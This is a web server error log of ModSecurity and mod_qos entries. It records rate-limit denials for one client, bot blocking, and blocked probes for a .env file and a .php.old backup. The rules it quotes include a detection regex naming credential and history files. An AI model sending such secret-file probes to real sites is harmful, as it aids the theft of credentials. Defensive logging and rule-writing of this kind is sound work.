[Tue May 26 19:55:12.499484 2026] [security2:error] [pid 93576:tid 93813] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/todo-list/src/.env"] [unique_id "ahWtSGDRMqfxdEDkoszYaQAAAGU"]
[Tue May 26 19:55:12.560085 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtSEqK9k_ZUB2Vp25RYwAAAcY
[Tue May 26 19:55:12.561806 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RZAAAAeE
[Tue May 26 19:55:12.566403 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RZQAAAf0
[Tue May 26 19:55:12.570716 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RZgAAAdA
[Tue May 26 19:55:12.588838 2026] [qos:error] [pid 93868:tid 94269] [client 45.148.10.120:48930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RaAAAAZo
[Tue May 26 19:55:12.589541 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYdgAAAB0
[Tue May 26 19:55:12.597401 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:43360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RagAAAbY
[Tue May 26 19:55:12.604443 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYeQAAACA
[Tue May 26 19:55:12.605489 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RawAAAfs
[Tue May 26 19:55:12.608143 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:43444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYegAAAFE
[Tue May 26 19:55:12.719021 2026] [qos:error] [pid 93868:tid 94258] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RbQAAAY8
[Tue May 26 19:55:12.719025 2026] [qos:error] [pid 93868:tid 94310] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RbAAAAcM
[Tue May 26 19:55:12.722092 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RbgAAAZE
[Tue May 26 19:55:12.739716 2026] [qos:error] [pid 93868:tid 94343] [client 45.148.10.120:48930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RbwAAAeQ
[Tue May 26 19:55:12.740931 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:43452] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYgQAAAHI
[Tue May 26 19:55:12.742174 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYggAAAEU
[Tue May 26 19:55:12.750609 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:43360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RcAAAAgQ
[Tue May 26 19:55:12.753609 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYhQAAAFM
[Tue May 26 19:55:12.753646 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RcQAAAZM
[Tue May 26 19:55:12.761523 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:43444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYhwAAAG4
[Tue May 26 19:55:12.805396 2026] [security2:error] [pid 93576:tid 93837] [client 54.39.203.35:39212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWtSGDRMqfxdEDkoszYiAAAAH0"]
[Tue May 26 19:55:12.805527 2026] [security2:error] [pid 93576:tid 93837] [client 54.39.203.35:39212] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWtSGDRMqfxdEDkoszYiAAAAH0"]
[Tue May 26 19:55:12.961592 2026] [qos:error] [pid 93868:tid 94385] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RdwAAAg4
[Tue May 26 19:55:12.963926 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25ReAAAAaE
[Tue May 26 19:55:12.966589 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYjgAAAEY
[Tue May 26 19:55:12.967040 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25ReQAAAcY
[Tue May 26 19:55:12.967692 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:43360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RegAAAcY
[Tue May 26 19:55:12.968922 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYjwAAADo
[Tue May 26 19:55:12.969229 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:43452] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYkAAAABg
[Tue May 26 19:55:12.969865 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:48930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RewAAAf0
[Tue May 26 19:55:12.971928 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:43444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYkQAAADQ
[Tue May 26 19:55:12.976651 2026] [qos:error] [pid 93868:tid 94348] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RfAAAAek
[Tue May 26 19:55:13.112221 2026] [qos:error] [pid 93868:tid 94307] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RfQAAAcA
[Tue May 26 19:55:13.116288 2026] [qos:error] [pid 93868:tid 94362] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RfgAAAfc
[Tue May 26 19:55:13.116658 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYkwAAAE8
[Tue May 26 19:55:13.117429 2026] [qos:error] [pid 93868:tid 94269] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RfwAAAZo
[Tue May 26 19:55:13.118936 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:43360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RgAAAAbY
[Tue May 26 19:55:13.119799 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:48930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RgQAAAfs
[Tue May 26 19:55:13.120513 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYlAAAACo
[Tue May 26 19:55:13.126156 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:43444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYlgAAAGI
[Tue May 26 19:55:13.126311 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:43452] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYlQAAACU
[Tue May 26 19:55:13.128067 2026] [qos:error] [pid 93868:tid 94329] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RggAAAdY
[Tue May 26 19:55:13.163465 2026] [security2:error] [pid 93576:tid 93733] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYhgAAABU"]
[Tue May 26 19:55:13.263150 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RgwAAAZE
[Tue May 26 19:55:13.265886 2026] [qos:error] [pid 93868:tid 94343] [client 45.148.10.120:56886] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RhAAAAeQ
[Tue May 26 19:55:13.267325 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:43372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYmAAAAHk
[Tue May 26 19:55:13.274519 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:48930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RhgAAAeE
[Tue May 26 19:55:13.275154 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:43360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RiAAAAeE
[Tue May 26 19:55:13.275436 2026] [qos:error] [pid 93868:tid 94385] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RhwAAAg4
[Tue May 26 19:55:13.277931 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:49196] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYmQAAAGs
[Tue May 26 19:55:13.278766 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYUAAAAA0"]
[Tue May 26 19:55:13.284402 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:43452] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYmwAAAC4
[Tue May 26 19:55:13.289865 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q7QAAAZ4"]
[Tue May 26 19:55:13.291883 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYNQAAABc"]
[Tue May 26 19:55:13.299842 2026] [security2:error] [pid 93868:tid 94330] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q4AAAAdc"]
[Tue May 26 19:55:13.302446 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q9AAAAfM"]
[Tue May 26 19:55:13.306933 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q8QAAAc0"]
[Tue May 26 19:55:13.307412 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q8gAAAao"]
[Tue May 26 19:55:13.310195 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q_QAAAd0"]
[Tue May 26 19:55:13.329893 2026] [security2:error] [pid 93868:tid 94344] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25RAQAAAeU"]
[Tue May 26 19:55:13.332927 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q8wAAAaA"]
[Tue May 26 19:55:13.339213 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYLQAAAFk"]
[Tue May 26 19:55:13.348471 2026] [security2:error] [pid 93576:tid 93751] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nav.php.old"] [unique_id "ahWtSWDRMqfxdEDkoszYnwAAACc"]
[Tue May 26 19:55:13.350947 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q9QAAAbg"]
[Tue May 26 19:55:13.366891 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q_AAAAa4"]
[Tue May 26 19:55:13.370924 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25RCwAAAfQ"]
[Tue May 26 19:55:13.373411 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYOQAAAHY"]
[Tue May 26 19:55:13.376456 2026] [security2:error] [pid 93868:tid 94295] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q9gAAAbQ"]
[Tue May 26 19:55:13.382074 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RLgAAAfw"]
[Tue May 26 19:55:13.389865 2026] [security2:error] [pid 93868:tid 94379] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25ROgAAAgg"]
[Tue May 26 19:55:13.390644 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYNgAAAG0"]
[Tue May 26 19:55:13.393962 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RMwAAAdk"]
[Tue May 26 19:55:13.398095 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYVgAAAAg"]
[Tue May 26 19:55:13.400706 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25RDgAAAa8"]
[Tue May 26 19:55:13.412167 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSEqK9k_ZUB2Vp25RMgAAAaI"]
[Tue May 26 19:55:13.417695 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYYQAAAFU"]
[Tue May 26 19:55:13.420270 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q_gAAAZ0"]
[Tue May 26 19:55:13.426532 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25RBwAAAc4"]
[Tue May 26 19:55:13.428480 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYSwAAAE0"]
[Tue May 26 19:55:13.439977 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtSGDRMqfxdEDkoszYUwAAACk"]
[Tue May 26 19:55:13.628065 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:49044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RvgAAAdA
[Tue May 26 19:55:13.629768 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:49132] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSWDRMqfxdEDkoszYyQAAAFk
[Tue May 26 19:55:13.630088 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RvwAAAdk
[Tue May 26 19:55:13.630710 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RwAAAAdk
[Tue May 26 19:55:13.632322 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RwgAAAb4
[Tue May 26 19:55:13.634570 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtSUqK9k_ZUB2Vp25RwwAAAZ4
[Tue May 26 19:55:13.634871 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RxQAAAa8
[Tue May 26 19:55:13.635044 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RxAAAAbI
[Tue May 26 19:55:13.638855 2026] [qos:error] [pid 93868:tid 94345] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RxgAAAeY
[Tue May 26 19:55:13.641549 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:49164] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSUqK9k_ZUB2Vp25RxwAAAeM
